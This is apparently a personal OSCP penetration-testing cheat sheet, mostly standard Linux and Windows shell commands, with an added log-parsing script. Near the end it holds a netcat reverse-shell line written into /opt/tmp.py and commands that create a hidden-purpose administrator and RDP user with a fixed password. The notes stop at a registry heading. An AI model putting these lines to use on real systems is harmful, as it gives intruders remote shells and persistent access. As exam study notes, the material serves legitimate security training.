OSCP
Linux main commands in OSCP
Find:
find / -name file 2>/dev/null
ls -ltr - Long listing sorted by modification time, oldest first (-t time, -r reverse).
# Remove recursively and its content. Very dangerous command!
rm -rf ./directory
List what rights the sudo user has.
sudo -l
# 2>/dev/null sends all "Permission denied" errors to /dev/null so only the matches are shown.
find / -name file 2>/dev/null
Which
Outputs the path of the binary that you are looking for. It searches through the directories that are defined in your $PATH variable.
which bash
# Usually outputs: /bin/bash
Filters
#sort
sort test.txt
#uniq
sort -u test.txt
sort test.txt | uniq
cat filename | sort -u > newFileName
grep
head
tail
tr
sed
# Delete the first line
sed "1d" file.txt
#cut
# Given this line of ping output:
64 bytes from 192.168.0.1: icmp_req=1 ttl=255 time=4.86 ms
# the following prints the fourth space-separated field, 192.168.0.1:
cut -d" " -f4
-d stands for delimiter and -f for field.
tr - Translate
Transform all letters into capital letters
tr "[:lower:]" "[:upper:]" < file1 > file2
Remove character
# Remove characters
cat file.txt | tr -d "."
# Replace all dots with underscores.
cat file.txt | tr "." "_"
awk
# General form: a pattern followed by the actions to run on every line that matches it
awk '/search_pattern/ { action_to_take_on_matches; another_action; }' file_to_parse
# No action given: matching lines are printed
awk '/172.16.40.10.81/' error.log
# No pattern given: the action runs on every line
awk '{print}' filename
We can use the -F flag to set a custom field delimiter:
awk -F ':' '{print $1}' test.txt
When manipulating text you may want to start the output with a header describing the columns. The BEGIN keyword runs an action once before the first line is read, and END runs one after the last line.
awk 'BEGIN {printf "IP-address \tPort\n"} /nop/ {print $3}' test.txt | head
awk 'BEGIN{printf "IP-address \tPort\n"} /nop/ {print $3} END {printf "End of the file\n"}' test.txt | tail
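As an added example that is not part of these notes, the filters above (awk with -F style field handling and BEGIN/END, sort, uniq, cut) chained on a few constructed sshd log lines to count failed logins per source IP. The log lines are made up for the example; the word "from" is searched for instead of a fixed column number because the "invalid user" lines shift the field positions.

```shell
#!/bin/bash
# Added example, not from the original notes: count failed SSH logins per source IP.

# Constructed sample log lines (not real data).
SAMPLE_LOG='Mar  1 10:00:01 host sshd[1001]: Failed password for root from 192.168.0.10 port 51122 ssh2
Mar  1 10:00:05 host sshd[1002]: Failed password for invalid user admin from 192.168.0.10 port 51123 ssh2
Mar  1 10:00:09 host sshd[1003]: Accepted password for sam from 192.168.0.20 port 51130 ssh2
Mar  1 10:00:12 host sshd[1004]: Failed password for sam from 192.168.0.20 port 51131 ssh2
Mar  1 10:00:15 host sshd[1005]: Failed password for root from 192.168.0.10 port 51124 ssh2'

# awk: keep only "Failed password" lines and print the field after "from" (the source IP).
# "invalid user" lines have two extra fields, so the IP is located by its neighbour, not by $N.
failed_ips() {
    printf '%s\n' "$SAMPLE_LOG" |
        awk '/Failed password/ { for (i = 1; i <= NF; i++) if ($i == "from") print $(i + 1) }'
}

# sort | uniq -c counts occurrences per IP; sort -rn puts the noisiest source first.
# Output format: "<ip> <count>" per line.
failed_counts() {
    failed_ips | sort | uniq -c | sort -rn | awk '{ print $2, $1 }'
}

# cut -d" " -f1 on the top line gives the IP with the most failures.
top_offender() {
    failed_counts | head -n 1 | cut -d" " -f1
}

# BEGIN prints a header, the main action prints one row per IP, END prints a trailer.
report() {
    failed_counts | awk 'BEGIN { printf "IP-address\tFailures\n" }
                         { printf "%s\t%s\n", $1, $2; n++ }
                         END { printf "Distinct sources: %d\n", n }'
}

report
```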
# list cronjobs
crontab -l
# Edit or create new cronjobs
crontab -e
# List all disks and their partitions
fdisk -l
#Systemctl
systemctl start ssh
systemctl status ssh
systemctl stop ssh
Netstat - Find outgoing and incoming connections
Netstat is a multiplatform tool, so it works on Mac, Windows and Linux.
netstat -antlp
netstat -anpt
# List the current firewall rules
iptables -L
# Remove one specific rule (here: rule number 2 of the INPUT chain)
iptables -D INPUT 2
Iteration over a file
This script will iterate over a file and echo out every single line. Note that $(cat ...) is split on whitespace, so IFS is set to a newline to keep each line together:
#!/bin/bash
IFS=$'\n'
for line in $(cat file.txt); do
echo "$line"
done
Another Way
#!/bin/bash
while read -r p; do
echo "$p"
done < file.txt
For Loops
#!/bin/bash
for ((i = 0; i < 10; i++)); do
echo $i
done
Another way to write this is by using the program seq. seq is pretty much like range() in Python, so it can be used like this:
#!/bin/bash
for x in $(seq 1 100); do
echo "$x"
done
The output of one command can be used as the input of another. First find the last match that locate reports:
#!/bin/bash
locate 646.c | tail -n 1
This can be done inline with command substitution, like this:
#!/bin/bash
cat $(locate 646.c | tail -n 1)
Vi Operators
Operators
Operators are commands that do things. Like delete, change or copy.
c - change
ce - change until end of the word.
c$ - change until end of line.
Combining Motions and Operators
Now that you know some motion commands and operator commands, you can start combining them.
dw - delete word
d$ - delete to the end of the line
Password Creation
# Generate a crypt-style hash of the password "sam", e.g. for a passwd/shadow entry
openssl passwd sam
Windows Commands
cmd:
show hidden files:
dir /A
Print out file content, like cat
type file.txt
grep files (findstr needs a search string followed by the file)
findstr "string" file.txt
show network information
netstat -an
Show network adapter info
ipconfig
Traceroute
tracert
List processes
tasklist
Kill a process
taskkill /PID 1532 /F
Shreds (overwrites) the free space of the whole C: drive
cipher /w:C:\
Mounting - Mapping
wmic logicaldisk get deviceid, volumename, description
Scripts for fun
Make Request:
import requests

req = requests.get("http://site.com")
print(req.status_code)
print(req.text)
Read and write to files
# Read the file line by line and stop reporting when the marker line is reached
with open("readme.txt", "r") as file_open:
    for line in file_open:
        print(line.strip("\n"))
        if line.strip("\n") == "rad 4":
            print("last line")
echo 'import os; os.system("/bin/nc ip port -e /bin/bash")' > /opt/tmp.py
Add RDP User
Windows
net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add
Enable RDP via Registry